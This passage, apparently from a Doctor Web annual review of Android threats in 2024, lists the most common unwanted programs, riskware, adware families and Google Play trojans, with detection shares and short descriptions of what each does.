        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds.Aegis&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds.Aegis&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A trojan app that conceals its presence on Android devices and displays intrusive ads. It has a number of characteristics that differentiate it from other members of the &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; family. For example, this trojan can run automatically after its installation. Moreover, it implements a mechanism that allows its service to remain constantly running. And, in some cases, it can also use hidden Android operating system functions.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.MobiDash&amp;lng=en"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7815&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A trojan app that displays obnoxious ads. It is a special software module that developers incorporate into applications.&lt;/dd&gt;
    &lt;/dl&gt;

    &lt;h3&gt;Unwanted software&lt;/h3&gt;
    &lt;p&gt;
        The unwanted program most commonly detected in 2024 was &lt;a href="https://vms.drweb.com/search/?q=Program.FakeMoney&amp;lng=en"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;. It accounted for more than half (52.10%) of the total number 
        of unwanted software detected on protected devices. It belongs to a class of apps that offer users a chance to make money by completing various tasks but ultimately 
        do not provide any real rewards.
    &lt;/p&gt;
    &lt;p&gt;
        Programs that Dr.Web anti-virus detects as &lt;a href="https://vms.drweb.com/search/?q=Program.CloudInject&amp;lng=en"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt; ranked second, with a share of 19.21% (up 9.75 pp. from the previous year). 
        Such apps are modified through the CloudInject cloud service. When modified, they have dangerous permissions and an obfuscated code added to them, and the purpose 
        of that code cannot be controlled.
    &lt;/p&gt;
    &lt;p&gt;
        &lt;a href="https://vms.drweb.com/search/?q=Program.FakeAntiVirus&amp;lng=en"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt; program activity declined for the second year in a row. With a share of 10.07%, which is down 9.35 pp. 
        from 2023, these programs became the third most widespread unwanted software. They imitate anti-virus software, detect nonexistent threats, and 
        ask users to buy full versions to “fix” the issues that have allegedly been found.
    &lt;/p&gt;
    &lt;p&gt;
        Over the course of last year, users encountered a variety of programs for monitoring and controlling activity. Such software can be used to collect data, 
        both with the consent of device owners and without their knowledge. In the latter case, these actually turn into spying tools. The following monitoring 
        programs were most often detected on devices protected by Dr.Web anti-virus: 
        &lt;a href="https://vms.drweb.com/search/?q=Program.TrackView&amp;lng=en"&gt;&lt;b&gt;Program.TrackView&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt; (2.40% of cases), &lt;a href="https://vms.drweb.com/search/?q=Program.SecretVideoRecorder&amp;lng=en"&gt;&lt;b&gt;Program.SecretVideoRecorder&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt; (2.03% of cases), 
        &lt;a href="https://vms.drweb.com/search/?q=Program.wSpy&amp;lng=en"&gt;&lt;b&gt;Program.wSpy&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3.origin&lt;/b&gt; (0.98% of cases), &lt;a href="https://vms.drweb.com/search/?q=Program.SecretVideoRecorder&amp;lng=en"&gt;&lt;b&gt;Program.SecretVideoRecorder&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt; (0.90% of cases), 
        &lt;a href="https://vms.drweb.com/search/?q=Program.Reptilicus&amp;lng=en"&gt;&lt;b&gt;Program.Reptilicus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.8.origin&lt;/b&gt; (0.64% of cases), &lt;a href="https://vms.drweb.com/search/?q=Program.wSpy&amp;lng=en"&gt;&lt;b&gt;Program.wSpy&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt; (0.39% of cases), and &lt;a href="https://vms.drweb.com/search/?q=Program.MonitorMinor&amp;lng=en"&gt;&lt;b&gt;Program.MonitorMinor&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt; (0.38% of cases).
    &lt;/p&gt;
    &lt;p&gt;
        Additionally, &lt;a href="https://vms.drweb.com/search/?q=Program.Opensite&amp;lng=en"&gt;&lt;b&gt;Program.Opensite&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt; Android programs, with a share of 0.60% of all the unwanted software detected, were also spotted. 
        These programs are designed to load target websites and display ads.
    &lt;/p&gt;
    &lt;p&gt;The ten unwanted programs most commonly detected in 2024:&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/07_top_unwanted_2024_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/07_top_unwanted_2024_en.png" alt="Most_Common_Unwanted_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.FakeMoney&amp;lng=en"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.FakeMoney&amp;lng=en"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for Android applications that allegedly allow users to earn money by completing different tasks. These apps make it look as if rewards are accruing for each one that is completed. At the same time, users are told that they have to accumulate a certain sum to withdraw their “earnings”. Typically, such apps have a list of popular payment systems and banks that supposedly could be used to withdraw the rewards. But even if users succeed in accumulating the needed amount, in reality they cannot get any real payments. This virus record is also used to detect other unwanted software based on the source code of such apps.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.CloudInject&amp;lng=en"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for Android programs that have been modified using the CloudInject cloud service and the eponymous Android utility (the latter was added to the Dr.Web virus database as &lt;a href="https://vms.drweb.com/search/?q=Tool.CloudInject&amp;lng=en"&gt;&lt;b&gt;Tool.CloudInject&lt;/b&gt;&lt;/a&gt;). Such programs are modified on a remote server; meanwhile, the modders (users) who are interested in such modifications cannot control exactly what will be added to the apps. Moreover, these programs receive a number of dangerous system permissions. Once modification is complete, users can remotely manage these apps. They can block them, display custom dialogs, and track when other software is being installed or removed from a device, etc.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.FakeAntiVirus&amp;lng=en"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for adware programs that imitate anti-virus software. These apps inform users of nonexistent threats, mislead them, and demand that they purchase the software’s full version.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.TrackView&amp;lng=en"&gt;&lt;b&gt;Program.TrackView&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for a program that allows users to be monitored via their Android devices. Malicious actors can utilize it to track a target device’s location, use the camera to record video and take photos, eavesdrop via the microphone, record audio, etc.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.SecretVideoRecorder&amp;lng=en"&gt;&lt;b&gt;Program.SecretVideoRecorder&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.SecretVideoRecorder&amp;lng=en"&gt;&lt;b&gt;Program.SecretVideoRecorder&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for various modifications of an application that is designed to record videos and take photos in the background, using built-in Android device cameras. It can operate covertly by allowing notifications about ongoing recordings to be disabled. It also allows an app’s icon and name to be replaced with fake ones. This functionality makes this software potentially dangerous.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.wSpy&amp;lng=en"&gt;&lt;b&gt;Program.wSpy&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;This is a commercial spyware app designed to covertly monitor Android device user activity. It allows intruders to read SMS and chats in popular messaging software, listen to the surroundings, track device location and browser history, gain access to the phonebook and contacts, photos and videos, and take screenshots and pictures through a device’s built-in camera. In addition, it has keylogger functionality.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.Reptilicus&amp;lng=en"&gt;&lt;b&gt;Program.Reptilicus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.8.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;An application that allows Android device users to be monitored. It can track device location, collect information from SMS and social media messages, intercept phone calls and record the surroundings, take screenshots, act as a keylogger, copy files from a target device and perform other actions.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.Opensite&amp;lng=en"&gt;&lt;b&gt;Program.Opensite&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for single-type Android programs whose function is to load target websites and display ads. Such apps often masquerade as other software. For instance, there exist modifications that are distributed under the guise of YouTube player. They load a genuine YouTube website and display advertisement banners, using the advertising SDKs connected to them.&lt;/dd&gt;
    &lt;/dl&gt;

    &lt;h3&gt;Riskware&lt;/h3&gt;
    &lt;p&gt;
        In 2024, &lt;a href="https://vms.drweb.com/search/?q=Tool.SilentInstaller&amp;lng=en"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt; utilities, which allow Android programs to launch without being installed, retained their leading 
        positions in terms of riskware software detection numbers. In total, they accounted for more than a third of all apps of this type identified 
        on protected devices. Modifications like &lt;a href="https://vms.drweb.com/search/?q=Tool.SilentInstaller&amp;lng=en"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.17.origin&lt;/b&gt; (16.17%), &lt;a href="https://vms.drweb.com/search/?q=Tool.SilentInstaller&amp;lng=en"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.14.origin&lt;/b&gt; (9.80%), 
        &lt;a href="https://vms.drweb.com/search/?q=Tool.SilentInstaller&amp;lng=en"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7.origin&lt;/b&gt; (3.25%), and &lt;a href="https://vms.drweb.com/search/?q=Tool.SilentInstaller&amp;lng=en"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.6.origin&lt;/b&gt; (2.99%) were most often detected.
    &lt;/p&gt;
    &lt;p&gt;
        Other common riskware apps were programs modified using the NP Manager utility. This tool embeds a special module into the target software, which allows the digital 
        signature verification process to be bypassed once the apps have been modified. Dr.Web anti-virus detects such programs as different variants of the &lt;b&gt;Tool.NPMod&lt;/b&gt; family. 
        Of these, &lt;b&gt;Tool.NPMod.1&lt;/b&gt; variants were most commonly detected. Over the course of 2024, they significantly strengthened their position, accounting for 16.49% of all riskware 
        detections, up 11.68 pp. from 2023. At the same time, the share of programs modified using the NP Manager tool and detected with another virus record, 
        &lt;b&gt;Tool.NPMod.2&lt;/b&gt;, was 7.92%. As a result, members of this family were responsible for almost a quarter of potentially dangerous software detections.
    &lt;/p&gt;
    &lt;p&gt;
        Programs protected by the &lt;a href="https://vms.drweb.com/search/?q=Tool.Packer&amp;lng=en"&gt;&lt;b&gt;Tool.Packer&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt; packer were also among the leaders. They were detected in 13.17% of cases, up 12.38 pp. 
        from the year before. Moreover, the number of &lt;a href="https://vms.drweb.com/search/?q=Tool.Androlua&amp;lng=en"&gt;&lt;b&gt;Tool.Androlua&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt; detections increased from 3.10% to 3.93%. This is a framework that 
        makes it possible to modify Android apps and run Lua scripts that can potentially be malicious.
    &lt;/p&gt;
    &lt;p&gt;
        At the same time, one 2023 leader, the &lt;a href="https://vms.drweb.com/search/?q=Tool.LuckyPatcher&amp;lng=en"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt; family of utilities, was, on the contrary, less active—down from 14.02% to 8.16%. 
        These tools allow Android programs to be modified and scripts downloaded from the Internet to be added to them. Also less frequently encountered were 
        programs protected by the obfuscating utility &lt;a href="https://vms.drweb.com/search/?q=Tool.Obfuscapk&amp;lng=en"&gt;&lt;b&gt;Tool.Obfuscapk&lt;/b&gt;&lt;/a&gt; (down from 3.22% to 1.05%) and by the packer &lt;a href="https://vms.drweb.com/search/?q=Tool.ApkProtector&amp;lng=en"&gt;&lt;b&gt;Tool.ApkProtector&lt;/b&gt;&lt;/a&gt; 
        (down from 10.14% to 3.39%).
    &lt;/p&gt;
    &lt;p&gt;The ten most widespread riskware apps detected on protected Android devices in 2024:&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/08_top_riskware_2024_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/08_top_riskware_2024_en.png" alt="Most_Common_Riskware_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;b&gt;Tool.NPMod.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;b&gt;Tool.NPMod.2&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for Android programs that have been modified using the NP Manager utility. A special module is embedded in such apps, and it allows them to bypass digital signature verification once they have been modified.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Tool.SilentInstaller&amp;lng=en"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.17.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Tool.SilentInstaller&amp;lng=en"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.14.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Tool.SilentInstaller&amp;lng=en"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Tool.SilentInstaller&amp;lng=en"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.6.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Riskware platforms that allow applications to launch APK files without installing them. They create a virtual runtime environment in the context of the apps in which they are integrated. The APK files, launched with the help of these platforms, can operate as if they are part of such programs and can also obtain the same permissions.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Tool.Packer&amp;lng=en"&gt;&lt;b&gt;Tool.Packer&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A packer tool designed to protect Android applications from unauthorized modification and reverse engineering. This tool is not malicious in itself, but it can be used to protect both harmless and malicious software.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Tool.LuckyPatcher&amp;lng=en"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A tool that allows apps installed on Android devices to be modified (i.e., by creating patches for them) in order to change the logic of their work or to bypass certain restrictions. For instance, users can apply it to disable root-access verification in banking software or to obtain unlimited resources in games. To add patches, this utility downloads from the Internet specially prepared scripts, which can be crafted and added to the common database by any third party. The functionality of such scripts can prove to be malicious; thus, patches made with this tool can pose a potential threat.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Tool.Androlua&amp;lng=en"&gt;&lt;b&gt;Tool.Androlua&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for some potentially dangerous versions of a specialized framework for developing Android software in the Lua scripting language. The main logic of Lua-based apps resides in the corresponding scripts that are encrypted and decrypted by the interpreter upon execution. By default, this framework often requests access to a large number of system permissions in order to operate. As a result, the Lua scripts that it executes can potentially perform various malicious actions in accordance with the acquired permissions.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Tool.Packer&amp;lng=en"&gt;&lt;b&gt;Tool.Packer&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for Android programs whose code is encoded and obfuscated by the NP Manager tool.&lt;/dd&gt;
    &lt;/dl&gt;

    &lt;h3&gt;Adware&lt;/h3&gt;
    &lt;p&gt;
        The most common adware in 2024 was the new &lt;a href="https://vms.drweb.com/search/?q=Adware.ModAd&amp;lng=en"&gt;&lt;b&gt;Adware.ModAd&lt;/b&gt;&lt;/a&gt; family, which accounted for 47.45% of detections. 
        The previous year’s leaders, members of the &lt;a href="https://vms.drweb.com/search/?q=Adware.Adpush&amp;lng=en"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt; family, dropped to second place with a share of 14.76% 
        (a 21.06 pp. decrease in the number of detections). Third place, with a share of 8.68%, was occupied by another new adware family, &lt;b&gt;Adware.Basement&lt;/b&gt;.
    &lt;/p&gt;
    &lt;p&gt;
        Also commonly encountered were families like &lt;a href="https://vms.drweb.com/search/?q=Adware.Airpush&amp;lng=en"&gt;&lt;b&gt;Adware.Airpush&lt;/b&gt;&lt;/a&gt; (their share decreased from 8.59% to 4.35%), &lt;a href="https://vms.drweb.com/search/?q=Adware.Fictus&amp;lng=en"&gt;&lt;b&gt;Adware.Fictus&lt;/b&gt;&lt;/a&gt; (down from 4.41% to 3.29%), 
        &lt;a href="https://vms.drweb.com/search/?q=Adware.Leadbolt&amp;lng=en"&gt;&lt;b&gt;Adware.Leadbolt&lt;/b&gt;&lt;/a&gt; (down from 4.37% to 2.26%), and &lt;a href="https://vms.drweb.com/search/?q=Adware.ShareInstall&amp;lng=en"&gt;&lt;b&gt;Adware.ShareInstall&lt;/b&gt;&lt;/a&gt; (down from 5.04% to 1.71%). Unwanted ad-displaying &lt;a href="https://vms.drweb.com/search/?q=Adware.MagicPush&amp;lng=en"&gt;&lt;b&gt;Adware.MagicPush&lt;/b&gt;&lt;/a&gt; 
        programs, which ranked second in 2023, significantly curtailed their activity and did not even make it into the top 10; they moved straight to eleventh place with a share 
        of 1.19% (a 8.39 pp. decrease).
    &lt;/p&gt;
    &lt;p&gt;The ten most widespread adware apps detected on protected Android devices in 2024:&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/09_top_adware_2024_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/09_top_adware_2024_en.png" alt="Most_Common_Adware_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.ModAd&amp;lng=en"&gt;&lt;b&gt;Adware.ModAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for some modified versions (mods) of the WhatsApp messenger, whose functions have been injected with a specific code. This code is responsible for loading target URLs by displaying web content (via the Android WebView component) when the messenger is in operation. Such web addresses perform redirects to advertised sites, including online casino, bookmaker, and adult sites.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;Adware.Basement.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;These are apps that display unwanted ads which often lead to malicious and fraudulent websites. They share a common code base with the &lt;a href="https://vms.drweb.com/search/?q=Program.FakeMoney&amp;lng=en"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt; unwanted applications.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.Fictus&amp;lng=en"&gt;&lt;b&gt;Adware.Fictus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.Fictus&amp;lng=en"&gt;&lt;b&gt;Adware.Fictus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;An adware module that malicious actors embed into cloned versions of popular Android games and applications. Its incorporation is facilitated by a specialized net2share packer. Copies of software created this way are then distributed through various software catalogs. When installed on Android devices, such apps and games display obnoxious ads.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.Adpush&amp;lng=en"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.21846&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.AdPush&amp;lng=en"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.39.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Adware modules that can be built into Android apps. They display notifications containing ads that mislead users. For example, such notifications can look like messages from the operating system. In addition, these modules collect a variety of confidential data and are able to download other apps and initiate their installation.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.Airpush&amp;lng=en"&gt;&lt;b&gt;Adware.Airpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Adware modules that can be built into Android apps and display various ads. Depending on the modules’ version and modification, these can be notifications containing ads, pop-up windows or banners. Malicious actors often use these modules to distribute malware by offering their potential victims diverse software for installation. Moreover, such modules collect personal information and send it to a remote server.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.ShareInstall&amp;lng=en"&gt;&lt;b&gt;Adware.ShareInstall&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;An adware module that can be built into Android applications. It displays notifications containing ads on the Android OS lock screen.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.Youmi&amp;lng=en"&gt;&lt;b&gt;Adware.Youmi&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for an unwanted adware module that adds advertizing shortcuts onto the Android OS home screen.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.Inmobi&amp;lng=en"&gt;&lt;b&gt;Adware.Inmobi&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for some versions of the Inmobi adware SDK. These are capable of making phone calls and adding event entries into an Android device’s calendar.&lt;/dd&gt;
    &lt;/dl&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="gplay"&gt;
    &lt;h2 class="alignCenter"&gt;Threats on Google Play&lt;/h2&gt;
    &lt;p&gt;
        In 2024, Doctor Web’s virus analysts discovered over 200 threats with more than 26.7 million combined downloads. 
        In addition to &lt;a href="https://vms.drweb.com/search/?q=Android.Click.414.origin&amp;lng=en"&gt;&lt;b&gt;Android.Click.414.origin&lt;/b&gt;&lt;/a&gt;, these included many other threats, such as ad-displaying &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; 
        trojans. They were distributed under the guise of all kinds of software: image-editing programs, QR code scanners, image collection apps, 
        and even an “anti-theft” alarm for protecting smartphones from falling into the wrong hands. Such trojans conceal their icons after 
        installation and proceed to display aggressive ads that overlap the interface of the operating system and other programs and prevent the 
        device from being used normally.
    &lt;/p&gt;

    &lt;div class="flex fxCenter"&gt;
        &lt;div class="margRM"&gt;
              &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/10_Android.HiddenAds.4013_2024.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/10_Android.HiddenAds.4013_2024.png" alt="Android.HiddenAds_2024" style="max-width: 350px;"&gt;
              &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
              &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/11_Android.HiddenAds.4034_2024.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/11_Android.HiddenAds.4034_2024.png" alt="Android.HiddenAds_2024" style="max-width: 350px;"&gt;
              &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;div class="flex fxCenter"&gt;
        &lt;div class="margRM"&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/12_Android.HiddenAds.4025_2024.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/12_Android.HiddenAds.4025_2024.png" alt="Android.HiddenAds_2024" style="max-width: 350px;"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/13_Android.HiddenAds.656.origin_2024.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/13_Android.HiddenAds.656.origin_2024.png" alt="Android.HiddenAds_2024" style="max-width: 350px;"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
        Examples of adware trojans discovered on Google Play in 2024. &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4013&lt;/b&gt; was hiding in the photo editor “Cool Fix Photo Enhancer”, 
        &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4034&lt;/b&gt; was in the  “Cool Darkness Wallpaper” image-collection app, &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4025&lt;/b&gt; was in the QR scanning program “QR Code Assistant”, and 
        &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.656.origin&lt;/b&gt; was in the “anti-theft” alarm program “Warning Sound GBD”
    &lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        Our experts also discovered various trojans that threat actors were protecting with a complicated software packer.
    &lt;/p&gt;

    &lt;div class="flex fxCenter"&gt;
        &lt;div class="margRM"&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/14_Android.Packed.57156_2024.0.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/14_Android.Packed.57156_2024.1.png" alt="Android.Packed_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/15_Android.Packed.57159_2024.0.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/15_Android.Packed.57159_2024.1.png" alt="Android.Packed_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
        The “Lie Detector Fun Prank” program was the &lt;a href="https://vms.drweb.com/search/?q=Android.Packed&amp;lng=en"&gt;&lt;b&gt;Android.Packed&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.57156&lt;/b&gt; 
